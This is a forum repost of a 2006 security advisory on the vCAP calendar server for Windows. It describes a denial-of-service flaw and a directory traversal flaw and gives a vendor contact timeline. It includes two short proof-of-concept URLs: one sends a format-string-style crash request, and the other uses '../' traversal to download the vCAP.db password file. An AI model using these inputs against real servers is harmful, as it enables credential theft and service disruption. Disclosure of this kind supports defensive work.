Jump to content
zbeng

vCAP calendar server Multiple vulnerability

By zbeng, in Exploituri

Recommended Posts

zbeng Newbie

zbeng

Posted
Posted

title: vCAP calendar server Multiple vulnerability

Author: securma massine <securma@morx.org>

MorX Security Research Team

http://www.morx.org

Product info : vCAP (www.pscs.co.uk)is a network calendar server for Windows. vCAP allows user to create calendars which can be viewed and modified by people on  network using a web browser.

Original Advisory/PoC : http://www.morx.org/vcap.txt

Severity: Medium/High - user can remotely attack the server

Vulnerability Description:

v1: denial of service attack with a specific request

v2: directory traversal , any file on the system can be downloaded  ,especially vCAp's passwords  (vCAP.db)

Affected Software(s): vCAP calendar server 1.9.0 Beta and prior

Affected platform(s): Windows

Exploit/Proof of Concept:

v1- http://127.0.0.1:6100/StoresAndCalendarsLi...sion=%d%d%d%d%d

v2- http://127.0.0.1:6100/../Data/vCAP.db

Solution : ??

History:

16/08/2006  initial vendor contact

17/08/2006  sending vulnerability details

31/08/2006  vulnerability confirmed

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose only.The author do not have any responsibility for any malicious use of this advisory or proof of concept code.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...